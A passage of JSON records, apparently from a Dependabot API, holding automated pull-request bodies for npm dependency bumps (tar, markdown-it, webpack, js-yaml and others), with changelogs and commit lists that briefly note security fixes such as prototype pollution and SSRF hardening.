href=\"https://github.com/immutable-js/immutable-js/commit/faeb58b0cc71ed351dc51f672a95ae21bc859ef5\"\u003e\u003ccode\u003efaeb58b\u003c/code\u003e\u003c/a\u003e fix Prototype Pollution in mergeDeep, toJS, etc.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/37ca4170060827e5f4eaa1969d1b61e5dc5eb11d\"\u003e\u003ccode\u003e37ca417\u003c/code\u003e\u003c/a\u003e release 4.3.7 (\u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/issues/2007\"\u003e#2007\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/23daf26b51ecc2805dcd9ac8534ce523397f9b62\"\u003e\u003ccode\u003e23daf26\u003c/code\u003e\u003c/a\u003e Fix issue with slice negative of filtered sequence (\u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/issues/2006\"\u003e#2006\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/493afba6ec17d9c999dc5a15ac80c71c6bdba1c3\"\u003e\u003ccode\u003e493afba\u003c/code\u003e\u003c/a\u003e release 4.3.6 (\u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/issues/1997\"\u003e#1997\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/be3cb9a7ae9a29f82c9d0c595f5f3cb957d7006c\"\u003e\u003ccode\u003ebe3cb9a\u003c/code\u003e\u003c/a\u003e Fix Repeat(\u0026lt;value\u0026gt;).equals(undefined) incorrectly returning true (\u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/issues/1994\"\u003e#1994\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/d7664bf9d3539da8ea095f2ed08bbe1cd0d46071\"\u003e\u003ccode\u003ed7664bf\u003c/code\u003e\u003c/a\u003e generate sitemap in path that will be deployed\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/f8327b1db0bb131df8a830cf14642f6ad07ca466\"\u003e\u003ccode\u003ef8327b1\u003c/code\u003e\u003c/a\u003e upgrade next sitemap (\u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/issues/1978\"\u003e#1978\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/immutable-js/immutable-js/compare/v4.3.5...v4.3.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for immutable since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"ht...\n\n_Description has been truncated_","html_url":"https://github.com/polaroidkidd/dle.dev/pull/164","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/polaroidkidd%2Fdle.dev/issues/164","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/164/packages"},{"uuid":"4108938865","node_id":"PR_kwDORikVvM7MMrra","number":10,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 8 directories with 19 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-03-20T22:33:36.000Z","author_association":null,"state_reason":null,"created_at":"2026-03-20T16:50:22.000Z","updated_at":"2026-03-20T22:33:37.000Z","time_to_close":20594,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":19,"packages":[{"name":"tar","old_version":"7.5.10","new_version":"7.5.11","repository_url":"https://github.com/isaacs/node-tar"},{"name":"markdown-it","old_version":"13.0.2","new_version":"14.1.1","repository_url":"https://github.com/markdown-it/markdown-it"},{"name":"webpack","old_version":"5.90.3","new_version":"5.104.1","repository_url":"https://github.com/webpack/webpack"},{"name":"file-type","old_version":"21.0.0","new_version":"21.3.2","repository_url":"https://github.com/sindresorhus/file-type"},{"name":"simple-git","old_version":"3.21.0","new_version":"3.32.3","repository_url":"https://github.com/steveukx/git-js"},{"name":"@octokit/endpoint","old_version":"9.0.5","new_version":"9.0.6","repository_url":"https://github.com/octokit/endpoint.js"},{"name":"@octokit/plugin-paginate-rest","old_version":"9.2.1","new_version":"9.2.2","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@octokit/request","old_version":"8.4.0","new_version":"8.4.1","repository_url":"https://github.com/octokit/request.js"},{"name":"bn.js","old_version":"4.12.0","new_version":"4.12.3","repository_url":"https://github.com/indutny/bn.js"},{"name":"cross-spawn","old_version":"6.0.5","new_version":"6.0.6","repository_url":"https://github.com/moxystudio/node-cross-spawn"},{"name":"ejs","old_version":"3.1.9","new_version":"3.1.10","repository_url":"https://github.com/mde/ejs"},{"name":"flatted","old_version":"3.2.6","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"yauzl","old_version":"3.2.0","new_version":"3.2.1","repository_url":"https://github.com/thejoshwolfe/yauzl"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 13 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [tar](https://github.com/isaacs/node-tar) | `7.5.10` | `7.5.11` |\n| [markdown-it](https://github.com/markdown-it/markdown-it) | `13.0.2` | `14.1.1` |\n| [webpack](https://github.com/webpack/webpack) | `5.90.3` | `5.104.1` |\n| [file-type](https://github.com/sindresorhus/file-type) | `21.0.0` | `21.3.2` |\n| [simple-git](https://github.com/steveukx/git-js/tree/HEAD/simple-git) | `3.21.0` | `3.32.3` |\n| [@octokit/endpoint](https://github.com/octokit/endpoint.js) | `9.0.5` | `9.0.6` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `9.2.1` | `9.2.2` |\n| [@octokit/request](https://github.com/octokit/request.js) | `8.4.0` | `8.4.1` |\n| [bn.js](https://github.com/indutny/bn.js) | `4.12.0` | `4.12.3` |\n| [cross-spawn](https://github.com/moxystudio/node-cross-spawn) | `6.0.5` | `6.0.6` |\n| [ejs](https://github.com/mde/ejs) | `3.1.9` | `3.1.10` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.2.6` | `3.4.2` |\n| [yauzl](https://github.com/thejoshwolfe/yauzl) | `3.2.0` | `3.2.1` |\n\nBumps the npm_and_yarn group with 9 updates in the /docs directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [glob](https://github.com/isaacs/node-glob) | `10.4.5` | `10.5.0` |\n| [tar](https://github.com/isaacs/node-tar) | `7.4.3` | `7.5.12` |\n| [ws](https://github.com/websockets/ws) | `7.5.8` | `7.5.10` |\n| [ajv](https://github.com/ajv-validator/ajv) | `6.12.6` | `6.14.0` |\n| [webpack](https://github.com/webpack/webpack) | `5.91.0` | `5.105.4` |\n| [cross-spawn](https://github.com/moxystudio/node-cross-spawn) | `7.0.3` | `7.0.6` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.1` | `1.15.11` |\n| [dompurify](https://github.com/cure53/DOMPurify) | `3.3.1` | `3.3.3` |\n| [svgo](https://github.com/svg/svgo) | `3.3.2` | `3.3.3` |\n\nBumps the npm_and_yarn group with 1 update in the /packages/cli/cloud directory: [tar](https://github.com/isaacs/node-tar).\nBumps the npm_and_yarn group with 1 update in the /packages/cli/create-strapi-app directory: [tar](https://github.com/isaacs/node-tar).\nBumps the npm_and_yarn group with 1 update in the /packages/core/content-manager directory: [markdown-it](https://github.com/markdown-it/markdown-it).\nBumps the npm_and_yarn group with 1 update in the /packages/core/data-transfer directory: [tar](https://github.com/isaacs/node-tar).\nBumps the npm_and_yarn group with 1 update in the /packages/core/upload directory: [file-type](https://github.com/sindresorhus/file-type).\nBumps the npm_and_yarn group with 1 update in the /packages/utils/upgrade directory: [simple-git](https://github.com/steveukx/git-js/tree/HEAD/simple-git).\n\nUpdates `tar` from 7.5.10 to 7.5.11\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/bf776f673164215074b62749e0fe80e5834588f4\"\u003e\u003ccode\u003ebf776f6\u003c/code\u003e\u003c/a\u003e 7.5.11\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad\"\u003e\u003ccode\u003ef48b5fa\u003c/code\u003e\u003c/a\u003e prevent escaping symlinks with drive-relative paths\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/97cff15d3539a37a4095eb3d287147d9d77c2dc3\"\u003e\u003ccode\u003e97cff15\u003c/code\u003e\u003c/a\u003e docs: more security info\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/isaacs/node-tar/compare/v7.5.10...v7.5.11\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `markdown-it` from 13.0.2 to 14.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/markdown-it/markdown-it/blob/master/CHANGELOG.md\"\u003emarkdown-it's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[14.1.1] - 2026-01-11\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed regression from v13 in linkify inline rule. Specific patterns could\ncause high CPU use. Thanks to \u003ca href=\"https://github.com/ltduc147\"\u003e\u003ccode\u003e@​ltduc147\u003c/code\u003e\u003c/a\u003e for report.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[14.1.0] - 2024-03-19\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated CM spec compatibility to 0.31.2, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1009\"\u003e#1009\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed quadratic complexity when parsing references, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/996\"\u003e#996\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eFixed quadratic output size with pathological user input in tables, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1000\"\u003e#1000\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[14.0.0] - 2023-12-08\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDrop ancient browsers support (use \u003ccode\u003e.fromCodePoint\u003c/code\u003e and other features).\u003c/li\u003e\n\u003cli\u003eRewrite to ESM (including all plugins/deps). CJS fallback still available.\nNo signatures changed, except \u003ccode\u003emarkdown-it-emoji\u003c/code\u003e plugin.\u003c/li\u003e\n\u003cli\u003eDropped \u003ccode\u003edist/\u003c/code\u003e folder from repo, build on package publish.\u003c/li\u003e\n\u003cli\u003eSet \u003ccode\u003epunicode.js\u003c/code\u003e as external dependency.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eHtml tokens inside img alt are now rendered as their original text, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/896\"\u003e#896\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eHardbreaks inside img alt are now rendered as newlines.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/b4a9b659ef5734223731cfaa3ad5eacc6fc22918\"\u003e\u003ccode\u003eb4a9b65\u003c/code\u003e\u003c/a\u003e 14.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/4b4bbcae5e0990a5b172378e507b33a59012ed26\"\u003e\u003ccode\u003e4b4bbca\u003c/code\u003e\u003c/a\u003e Fixed perf regression in linkify-it wrapper\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/d2782d892a51201b25d3eeab172201ad5a53a24c\"\u003e\u003ccode\u003ed2782d8\u003c/code\u003e\u003c/a\u003e Add supplementary example-driven documentation (\u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1092\"\u003e#1092\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/0fe7ccb4b7f30236fb05f623be6924961d296d3d\"\u003e\u003ccode\u003e0fe7ccb\u003c/code\u003e\u003c/a\u003e 14.1.0 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/a367c44154d6c906c8652ed779af6a21f7eaed2e\"\u003e\u003ccode\u003ea367c44\u003c/code\u003e\u003c/a\u003e Fix typo in comments of text.mjs (\u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1015\"\u003e#1015\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/7ad81799725ef19627241f002fb1fa9cbd6a2a37\"\u003e\u003ccode\u003e7ad8179\u003c/code\u003e\u003c/a\u003e add changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/5e900639542bb36501ee9e960c07bfaa529431c9\"\u003e\u003ccode\u003e5e90063\u003c/code\u003e\u003c/a\u003e simplify logic in scanDelims\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/d7ce5ec66d3babcd165d432b68b3c55000349ccf\"\u003e\u003ccode\u003ed7ce5ec\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1009\"\u003e#1009\u003c/a\u003e from notriddle/spec-0.31.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/0bfc57de427b349865c4d85dccc7d4da00bca53f\"\u003e\u003ccode\u003e0bfc57d\u003c/code\u003e\u003c/a\u003e Update spec to 0.31.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/cd2477863fdcc182cc8739e9bedc7363acb344d8\"\u003e\u003ccode\u003ecd24778\u003c/code\u003e\u003c/a\u003e Update to comply with spec 0.31.2\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/markdown-it/markdown-it/compare/13.0.2...14.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack` from 5.90.3 to 5.104.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack/releases\"\u003ewebpack's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.104.1\u003c/h2\u003e\n\u003ch2\u003e5.104.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2efd21b: Reexports runtime calculation should not accessing \u003cstrong\u003eWEBPACK_IMPORT_KEY\u003c/strong\u003e decl with var.\u003c/li\u003e\n\u003cli\u003ec510070: Fixed a user information bypass vulnerability in the HttpUriPlugin plugin.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.104.0\u003c/h2\u003e\n\u003ch2\u003e5.104.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed3dd841: Use method shorthand to render module content in \u003ccode\u003e__webpack_modules__\u003c/code\u003e object.\u003c/li\u003e\n\u003cli\u003ed3dd841: Enhance \u003ccode\u003eimport.meta.env\u003c/code\u003e to support object access.\u003c/li\u003e\n\u003cli\u003e4baab4e: Optimize dependency sorting in updateParent: sort each module only once by deferring to finishUpdateParent(), and reduce traversal count in sortWithSourceOrder by caching WeakMap values upfront.\u003c/li\u003e\n\u003cli\u003e04cd530: Handle more at-rules for CSS modules.\u003c/li\u003e\n\u003cli\u003ecafae23: Added options to control the renaming of at-rules and various identifiers in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added \u003ccode\u003ebase64url\u003c/code\u003e, \u003ccode\u003ebase62\u003c/code\u003e, \u003ccode\u003ebase58\u003c/code\u003e, \u003ccode\u003ebase52\u003c/code\u003e, \u003ccode\u003ebase49\u003c/code\u003e, \u003ccode\u003ebase36\u003c/code\u003e, \u003ccode\u003ebase32\u003c/code\u003e and \u003ccode\u003ebase25\u003c/code\u003e digests.\u003c/li\u003e\n\u003cli\u003e5983843: Provide a stable runtime function variable \u003ccode\u003e__webpack_global__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Improved \u003ccode\u003elocalIdentName\u003c/code\u003e hashing for CSS.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e22c48fb: Added module existence check for informative error message in development mode.\u003c/li\u003e\n\u003cli\u003e50689e1: Use the fully qualified class name (or export name) for \u003ccode\u003e[fullhash]\u003c/code\u003e placeholder in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Support universal lazy compilation.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed module library export definitions when multiple runtimes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed CSS nesting and CSS custom properties parsing.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't write fragment from URL to filename and apply fragment to module URL.\u003c/li\u003e\n\u003cli\u003eaab1da9: Fixed bugs for \u003ccode\u003ecss/global\u003c/code\u003e type.\u003c/li\u003e\n\u003cli\u003ed3dd841: Compatibility \u003ccode\u003eimport.meta.filename\u003c/code\u003e and \u003ccode\u003eimport.meta.dirname\u003c/code\u003e with \u003ccode\u003eeval\u003c/code\u003e devtools.\u003c/li\u003e\n\u003cli\u003ed3dd841: Handle nested \u003ccode\u003e__webpack_require__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e728ddb7: The speed of identifier parsing has been improved.\u003c/li\u003e\n\u003cli\u003e0f8b31b: Improve types.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't corrupt \u003ccode\u003edebugId\u003c/code\u003e injection when \u003ccode\u003ehidden-source-map\u003c/code\u003e is used.\u003c/li\u003e\n\u003cli\u003e2179fdb: Re-validate HttpUriPlugin redirects against allowedUris, restrict to http(s) and add a conservative redirect limit to prevent SSRF and untrusted content inclusion. Redirects failing policy are rejected before caching/lockfile writes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Serialize \u003ccode\u003eHookWebpackError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added ability to use built-in properties in dotenv and define plugin.\u003c/li\u003e\n\u003cli\u003e3c4319f: Optimizing the regular expression character class by specifying ranges for runtime code.\u003c/li\u003e\n\u003cli\u003ed3dd841: Reduce collision for local indent name in CSS.\u003c/li\u003e\n\u003cli\u003ed3dd841: Remove CSS link tags when CSS imports are removed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.103.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003eDotenvPlugin\u003c/code\u003e and top level \u003ccode\u003edotenv\u003c/code\u003e option to enable this plugin\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003eWebpackManifestPlugin\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdded support the \u003ccode\u003eignoreList\u003c/code\u003e option in devtool plugins\u003c/li\u003e\n\u003cli\u003eAllow to use custom javascript parse function\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack/blob/main/CHANGELOG.md\"\u003ewebpack's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.104.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2efd21b: Reexports runtime calculation should not accessing \u003cstrong\u003eWEBPACK_IMPORT_KEY\u003c/strong\u003e decl with var.\u003c/li\u003e\n\u003cli\u003ec510070: Fixed a user information bypass vulnerability in the HttpUriPlugin plugin.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.104.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed3dd841: Use method shorthand to render module content in \u003ccode\u003e__webpack_modules__\u003c/code\u003e object.\u003c/li\u003e\n\u003cli\u003ed3dd841: Enhance \u003ccode\u003eimport.meta.env\u003c/code\u003e to support object access.\u003c/li\u003e\n\u003cli\u003e4baab4e: Optimize dependency sorting in updateParent: sort each module only once by deferring to finishUpdateParent(), and reduce traversal count in sortWithSourceOrder by caching WeakMap values upfront.\u003c/li\u003e\n\u003cli\u003e04cd530: Handle more at-rules for CSS modules.\u003c/li\u003e\n\u003cli\u003ecafae23: Added options to control the renaming of at-rules and various identifiers in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added \u003ccode\u003ebase64url\u003c/code\u003e, \u003ccode\u003ebase62\u003c/code\u003e, \u003ccode\u003ebase58\u003c/code\u003e, \u003ccode\u003ebase52\u003c/code\u003e, \u003ccode\u003ebase49\u003c/code\u003e, \u003ccode\u003ebase36\u003c/code\u003e, \u003ccode\u003ebase32\u003c/code\u003e and \u003ccode\u003ebase25\u003c/code\u003e digests.\u003c/li\u003e\n\u003cli\u003e5983843: Provide a stable runtime function variable \u003ccode\u003e__webpack_global__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Improved \u003ccode\u003elocalIdentName\u003c/code\u003e hashing for CSS.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e22c48fb: Added module existence check for informative error message in development mode.\u003c/li\u003e\n\u003cli\u003e50689e1: Use the fully qualified class name (or export name) for \u003ccode\u003e[fullhash]\u003c/code\u003e placeholder in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Support universal lazy compilation.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed module library export definitions when multiple runtimes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed CSS nesting and CSS custom properties parsing.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't write fragment from URL to filename and apply fragment to module URL.\u003c/li\u003e\n\u003cli\u003eaab1da9: Fixed bugs for \u003ccode\u003ecss/global\u003c/code\u003e type.\u003c/li\u003e\n\u003cli\u003ed3dd841: Compatibility \u003ccode\u003eimport.meta.filename\u003c/code\u003e and \u003ccode\u003eimport.meta.dirname\u003c/code\u003e with \u003ccode\u003eeval\u003c/code\u003e devtools.\u003c/li\u003e\n\u003cli\u003ed3dd841: Handle nested \u003ccode\u003e__webpack_require__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e728ddb7: The speed of identifier parsing has been improved.\u003c/li\u003e\n\u003cli\u003e0f8b31b: Improve types.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't corrupt \u003ccode\u003edebugId\u003c/code\u003e injection when \u003ccode\u003ehidden-source-map\u003c/code\u003e is used.\u003c/li\u003e\n\u003cli\u003e2179fdb: Re-validate HttpUriPlugin redirects against allowedUris, restrict to http(s) and add a conservative redirect limit to prevent SSRF and untrusted content inclusion. Redirects failing policy are rejected before caching/lockfile writes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Serialize \u003ccode\u003eHookWebpackError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added ability to use built-in properties in dotenv and define plugin.\u003c/li\u003e\n\u003cli\u003e3c4319f: Optimizing the regular expression character class by specifying ranges for runtime code.\u003c/li\u003e\n\u003cli\u003ed3dd841: Reduce collision for local indent name in CSS.\u003c/li\u003e\n\u003cli\u003ed3dd841: Remove CSS link tags when CSS imports are removed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc\"\u003e\u003ccode\u003e24e3c2d\u003c/code\u003e\u003c/a\u003e chore(release): new release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20253\"\u003e#20253\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/2efd21b0b06baa9b1a7f009b336379dcef24c1a5\"\u003e\u003ccode\u003e2efd21b\u003c/code\u003e\u003c/a\u003e fix(re-exports): reexports runtime calculation should not accessing `__WEBPAC...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/c5100702335a9cdcb75558ccd80def2329bd4abf\"\u003e\u003ccode\u003ec510070\u003c/code\u003e\u003c/a\u003e fix(security): userinfo bypass vulnerability in HttpUriPlugin allowedUris\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/4b0501c69700963bad1285b56f9cfa74704cb963\"\u003e\u003ccode\u003e4b0501c\u003c/code\u003e\u003c/a\u003e ci: fix release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20252\"\u003e#20252\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/0c213cecf2906bc41102c3a4cfdd1ad3522d0171\"\u003e\u003ccode\u003e0c213ce\u003c/code\u003e\u003c/a\u003e ci: use \u003ccode\u003e\\\u0026lt;@\u0026amp;1450591255485743204\u0026gt;\u003c/code\u003e over \u003ccode\u003e@here\u003c/code\u003e for discord notificationw\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/5bf8bc51bcfb49d25b73aae450b246cd8b8b423a\"\u003e\u003ccode\u003e5bf8bc5\u003c/code\u003e\u003c/a\u003e refactor: types for benchmarks and tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/505a5e744fbcf4471ddb534bf1d4aebea9643c1b\"\u003e\u003ccode\u003e505a5e7\u003c/code\u003e\u003c/a\u003e chore(release): new release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20188\"\u003e#20188\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/0c066808d59e4f9406e11bab4ffa2e0feacbd0e2\"\u003e\u003ccode\u003e0c06680\u003c/code\u003e\u003c/a\u003e refactor: update eslint configuration\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/2eb0d6a410513960bd7d65bf15baf15704a612eb\"\u003e\u003ccode\u003e2eb0d6a\u003c/code\u003e\u003c/a\u003e ci: release announcement (\u003ca 